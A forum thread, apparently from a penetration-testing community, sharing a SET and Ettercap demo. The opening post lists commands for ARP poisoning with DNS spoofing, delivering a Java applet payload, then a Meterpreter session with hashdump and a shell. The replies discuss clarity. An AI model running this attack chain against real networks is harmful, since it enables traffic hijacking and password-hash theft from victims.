SET & Ettercap (quick demo)
Ok I know SET has ettercap integrated in it for use but it didn't work when I made the tutorial., ReL1K only told me today that he managed to fix it !!!!
Video Blip.tv: Sickness - SET & Ettercap java applet
Video Blog: SET & Ettercap.
Commands:
Code:
root@bt:-# cd /pentest/exploits/SET
root@bt:-# nano config/set_config
root@bt:-# ./set
(SET SETUP)…
root@bt:-# nano /usr/share/ettercap/etter.dns
www.youtube.com A 192.168.1.64
root@bt:-# ettercap -T -i wlan0 -q -P dns_spoof -M ARP /192.168.1.254/ /192.168.1.67/
msf> sessions -l
msf> sessions -i 1
meterpreter> use priv
meterpreter> hashdump
meterpreter> shell
C:\Documents and Settings\UFO\Desktop> ipconfig
Hope you like it.
Re: SET & Ettercap (quick demo)
Nice video however I don't see what you actually did when you opened the "set_config". I also don't see it above in the "commands box". It may just be me missing it, but another line above stating it would be nice to have.
Also maybe sharing with others (that don't know) how to get this set + ettercap combo you speak of.
Re: SET & Ettercap (quick demo)
Quote:
Originally Posted by
Archangel-Amael
Nice video however I don't see what you actually did when you opened the "set_config". I also don't see it above in the "commands box". It may just be me missing it, but another line above stating it would be nice to have.
Also maybe sharing with others (that don't know) how to get this set + ettercap combo you speak of.
Yep I will make a tutorial now detailed about how to use them :) couldn't make one at that time because it didn't work.
Oh and the set_config file was just for users to see what to enable or disable. :D Another detailed one comming up.
Re: SET & Ettercap (quick demo)
Quote:
Originally Posted by
sickness
Yep I will make a tutorial now detailed about how to use them :) couldn't make one at that time because it didn't work.
Oh and the set_config file was just for users to see what to enable or disable. :D Another detailed one comming up.
Yes I understand what the set_config file is, my point is I don't see what you changed in the file (if anything) if you changed nothing from a default state then why bother to show it ? If you did change something from another tutorial or point in time that is not relevant to the guide then it might be better if you at least add what you changed.
Re: SET & Ettercap (quick demo)
Quote:
Originally Posted by
Archangel-Amael
Yes I understand what the set_config file is, my point is I don't see what you changed in the file (if anything) if you changed nothing from a default state then why bother to show it ? If you did change something from another tutorial or point in time that is not relevant to the guide then it might be better if you at least add what you changed.
Understood :D
Re: SET & Ettercap (quick demo)
OMG thats top notch dude! Amazing stuff there! I know this is an old thread but damn good none the less :)
Re: SET & Ettercap (quick demo)
Quote:
Originally Posted by
VulcanX
OMG thats top notch dude! Amazing stuff there! I know this is an old thread but damn good none the less :)
Yea pretty cool :) now you can do all this by just using the ettercap option from SET, it works now !